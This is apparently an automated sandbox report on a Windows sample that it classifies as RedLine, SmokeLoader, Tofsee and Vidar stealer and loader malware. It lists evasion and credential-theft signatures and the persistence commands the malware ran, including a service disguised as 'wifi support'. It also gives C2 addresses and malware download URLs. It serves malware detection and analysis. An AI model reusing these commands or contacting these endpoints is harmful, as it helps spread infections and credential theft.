Play interactive tour

Edit tour

Windows Analysis Report cz2ZyeL2Zd.exe

Overview

General Information

Sample Name:	cz2ZyeL2Zd.exe
Analysis ID:	549822
MD5:	246b41453b996bfa14f60d4785e598ac
SHA1:	977b7d8cc4237ca4c8a2268aedfff4d83c7d0a86
SHA256:	08a6dfeb7adf5eb90703abfab6c1f24a9f93c79e6287213f695c44f0181644ec
Tags:	exeRedLineStealer
Infos:
Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Detected unpacking (overwrites its own PE header)

Yara detected Vidar

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected Tofsee

Sigma detected: Copying Sensitive Files with Credential Data

Maps a DLL or memory area into another process

Found evasive API chain (may stop execution after checking mutex)

PE file has a writeable .text section

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after checking locale)

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Checks if the current machine is a virtual machine (disk enumeration)

Sample uses process hollowing technique

.NET source code references suspicious native API functions

Changes security center settings (notifications, updates, antivirus, firewall)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

.NET source code contains method to dynamically call methods (often used by packers)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Found evasive API chain (may stop execution after checking computer name)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Connects to a URL shortener service

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Creates files inside the system directory

PE file contains sections with non-standard names

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Found evaded block containing many API calls

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

cz2ZyeL2Zd.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\cz2ZyeL2Zd.exe" MD5: 246B41453B996BFA14F60D4785E598AC)

cz2ZyeL2Zd.exe (PID: 7052 cmdline: "C:\Users\user\Desktop\cz2ZyeL2Zd.exe" MD5: 246B41453B996BFA14F60D4785E598AC)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

5D68.exe (PID: 1764 cmdline: C:\Users\user\AppData\Local\Temp\5D68.exe MD5: 1F935BFFF0F8128972BC69625E5B2A6C)

EC9F.exe (PID: 6732 cmdline: C:\Users\user\AppData\Local\Temp\EC9F.exe MD5: 7442C55E6C71DA88E75CEF4A0B4B62CC)

2B8.exe (PID: 5780 cmdline: C:\Users\user\AppData\Local\Temp\2B8.exe MD5: 4738BD2D6F3E4DA081AF0A2218E21C37)

cmd.exe (PID: 3892 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\rhrovez\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6128 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\rljdetbq.exe" C:\Windows\SysWOW64\rhrovez\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 3404 cmdline: C:\Windows\SysWOW64\sc.exe" create rhrovez binPath= "C:\Windows\SysWOW64\rhrovez\rljdetbq.exe /d\"C:\Users\user\AppData\Local\Temp\2B8.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 5148 cmdline: C:\Windows\SysWOW64\sc.exe" description rhrovez "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

1F0B.exe (PID: 6016 cmdline: C:\Users\user\AppData\Local\Temp\1F0B.exe MD5: 9C40DF5E45E0C3095F7B920664A902D3)

1F0B.exe (PID: 2016 cmdline: C:\Users\user\AppData\Local\Temp\1F0B.exe MD5: 9C40DF5E45E0C3095F7B920664A902D3)

svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6200 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3796 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6260 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5944 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 6064 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5504 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4336 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

icgujuh (PID: 7124 cmdline: C:\Users\user\AppData\Roaming\icgujuh MD5: 246B41453B996BFA14F60D4785E598AC)

icgujuh (PID: 5608 cmdline: C:\Users\user\AppData\Roaming\icgujuh MD5: 246B41453B996BFA14F60D4785E598AC)

svchost.exe (PID: 7116 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Tofsee

{"C2 list": ["pa:443", "parubey.info:443"]}

Threatname: RedLine

{"C2 url": "86.107.197.138:38133"}

Threatname: SmokeLoader

{"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}

Threatname: Vidar

{"C2 url": "http://file-file-host4.com/tratata.php"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000001A.00000003.426261967.00000000047E0000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000003.00000002.328560589.0000000000580000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000016.00000002.398652642.00000000023A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000012.00000002.377828277.0000000000680000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.328581526.00000000005A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.413054469.0000000002E46000.00000004.00000020.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000012.00000002.377862377.00000000006A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000016.00000002.398263748.0000000000600000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001F.00000002.473714109.00000000041E1000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000000D.00000000.316265354.0000000002E01000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001F.00000002.473902157.0000000004351000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000002.461892339.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: EC9F.exe PID: 6732	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EC9F.exe PID: 6732	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 2B8.exe PID: 5780	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.cz2ZyeL2Zd.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
3.0.cz2ZyeL2Zd.exe.400000.4.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
3.1.cz2ZyeL2Zd.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
17.2.icgujuh.2c315a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.cz2ZyeL2Zd.exe.2dc15a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
31.2.1F0B.exe.443bbb0.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
18.2.icgujuh.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
3.0.cz2ZyeL2Zd.exe.400000.6.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
26.2.2B8.exe.400000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
31.2.1F0B.exe.42ffa30.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
26.2.2B8.exe.400000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
26.2.2B8.exe.47c0e50.1.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
31.2.1F0B.exe.443bbb0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.1F0B.exe.42ffa30.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
18.1.icgujuh.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
3.0.cz2ZyeL2Zd.exe.400000.5.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
26.3.2B8.exe.47e0000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Click to see the 12 entries

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\rljdetbq.exe" C:\Windows\SysWOW64\rhrovez\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\rljdetbq.exe" C:\Windows\SysWOW64\rhrovez\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2B8.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2B8.exe, ParentProcessId: 5780, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\rljdetbq.exe" C:\Windows\SysWOW64\rhrovez\, ProcessId: 6128

Sigma detected: New Service Creation

Show sources

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\SysWOW64\sc.exe" create rhrovez binPath= "C:\Windows\SysWOW64\rhrovez\rljdetbq.exe /d\"C:\Users\user\AppData\Local\Temp\2B8.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\SysWOW64\sc.exe" create rhrovez binPath= "C:\Windows\SysWOW64\rhrovez\rljdetbq.exe /d\"C:\Users\user\AppData\Local\Temp\2B8.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2B8.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2B8.exe, ParentProcessId: 5780, ProcessCommandLine: C:\Windows\SysWOW64\sc.exe" create rhrovez binPath= "C:\Windows\SysWOW64\rhrovez\rljdetbq.exe /d\"C:\Users\user\AppData\Local\Temp\2B8.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 3404

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://data-host-coin-8.com/files/9993_1641737702_2517.exe	Avira URL Cloud: Label: malware
Source: http://185.7.214.171:8080/6.php	URL Reputation: Label: malware
Source: http://data-host-coin-8.com/game.exe	Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/2184_1641247228_8717.exe	Avira URL Cloud: Label: malware
Source: http://unicupload.top/install5.exe	URL Reputation: Label: phishing
Source: http://unic11m.top/install1.exe	Avira URL Cloud: Label: malware
Source: parubey.info:443	Avira URL Cloud: Label: malware
Source: http://unicupload.top/install1.exe	Avira URL Cloud: Label: malware
Source: http://privacytools-foryou-777.com/downloads/toolspab1.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\rljdetbq.exe

Avira: detection malicious, Label: TR/Crypt.EPACK.Gen2

Found malware configuration

Show sources

Source: 00000003.00000002.328560589.0000000000580000.00000004.00000001.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
Source: 0000001F.00000002.473714109.00000000041E1000.00000004.00000001.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "86.107.197.138:38133"}
Source: 26.2.2B8.exe.47c0e50.1.raw.unpack	Malware Configuration Extractor: Tofsee {"C2 list": ["pa:443", "parubey.info:443"]}
Source: 23.2.EC9F.exe.2d20e50.1.raw.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://file-file-host4.com/tratata.php"}

Multi AV Scanner detection for submitted file

Show sources

Source: cz2ZyeL2Zd.exe

Virustotal: Detection: 33%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: unicupload.top	Virustotal: Detection: 15%	Perma Link
Source: amogohuigotuli.at	Virustotal: Detection: 12%	Perma Link
Source: host-data-coin-11.com	Virustotal: Detection: 15%	Perma Link
Source: privacytools-foryou-777.com	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Metadefender: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	ReversingLabs: Detection: 67%
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Metadefender: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\8FB8.exe	Metadefender: Detection: 14%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\8FB8.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\AEFA.exe	Metadefender: Detection: 48%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\AEFA.exe	ReversingLabs: Detection: 96%
Source: C:\Users\user\AppData\Local\Temp\BFF4.exe	Metadefender: Detection: 40%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\BFF4.exe	ReversingLabs: Detection: 96%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\AEFA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BFF4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rljdetbq.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ecgujuh	Joe Sandbox ML: detected

Source: 3.0.cz2ZyeL2Zd.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 26.2.2B8.exe.47c0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.cz2ZyeL2Zd.exe.400000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 26.2.2B8.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.3.2B8.exe.47e0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.cz2ZyeL2Zd.exe.400000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 23.3.EC9F.exe.2d50000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 23.2.EC9F.exe.2d20e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.cz2ZyeL2Zd.exe.400000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen7

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	23_2_00407470
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,	23_2_00404830
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,	23_2_00407510
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00407190 CryptUnprotectData,	23_2_00407190
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	23_2_004077A0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D276C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	23_2_02D276C0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D24A80 CryptStringToBinaryA,CryptStringToBinaryA,	23_2_02D24A80
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D279F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	23_2_02D279F0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D273E0 CryptUnprotectData,	23_2_02D273E0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D27760 CryptUnprotectData,LocalAlloc,LocalFree,	23_2_02D27760

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Unpacked PE file: 23.2.EC9F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Unpacked PE file: 26.2.2B8.exe.400000.0.unpack

Source: cz2ZyeL2Zd.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\5D68.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.14:443 -> 192.168.2.3:49876 version: TLS 1.2

Source:	Binary string: C:\hatisicovapehe\p.pdb source: 5D68.exe, 5D68.exe, 00000016.00000000.378270420.0000000000401000.00000020.00020000.sdmp, 5D68.exe, 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, 5D68.exe.13.dr, ecgujuh.13.dr
Source:	Binary string: C:\kekerotepuci_tilid-75-saworeka23-tomadur\6 sedotajo58_fita.pdb source: D830.exe.13.dr
Source:	Binary string: 9C:\pofecojuha\web\butasagit.pdb source: 2B8.exe.13.dr, rljdetbq.exe.26.dr
Source:	Binary string: C:\hexijomopeg-vob49\facabuyezuvet.pdb source: 97B8.exe.13.dr
Source:	Binary string: YC:\xexirujecutayo.pdb source: AEFA.exe.13.dr
Source:	Binary string: C:\besunutigubili\tik.pdb source: cz2ZyeL2Zd.exe, icgujuh.13.dr
Source:	Binary string: C:\pofecojuha\web\butasagit.pdb source: 2B8.exe.13.dr, rljdetbq.exe.26.dr
Source:	Binary string: FC:\tiz_simor\83_tazagukodofixe87\jusilirow94.pdb source: BFF4.exe.13.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: 8FB8.exe.13.dr
Source:	Binary string: C:\liziza-care-hozutuwikovap_tivohatudid\xemiwani23\d.pdb source: EC9F.exe.13.dr
Source:	Binary string: ^C:\kekerotepuci_tilid-75-saworeka23-tomadur\6 sedotajo58_fita.pdb source: D830.exe.13.dr
Source:	Binary string: C:\tiz_simor\83_tazagukodofixe87\jusilirow94.pdb source: BFF4.exe.13.dr
Source:	Binary string: C:\xexirujecutayo.pdb source: AEFA.exe.13.dr
Source:	Binary string: %C:\liziza-care-hozutuwikovap_tivohatudid\xemiwani23\d.pdb source: EC9F.exe.13.dr
Source:	Binary string: VC:\hatisicovapehe\p.pdb source: 5D68.exe, 00000016.00000000.378270420.0000000000401000.00000020.00020000.sdmp, 5D68.exe, 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, 5D68.exe.13.dr, ecgujuh.13.dr

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_00405E40
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	23_2_004096E0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,GlobalAlloc,FindClose,	23_2_00401280
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	23_2_00401090
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	23_2_00409B40
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_00409970
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_004087E0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D214D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	23_2_02D214D0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D212E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	23_2_02D212E0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D26090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_02D26090
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D28A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_02D28A30
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D29BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	23_2_02D29BC0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D29D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	23_2_02D29D90
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D29930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	23_2_02D29930

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

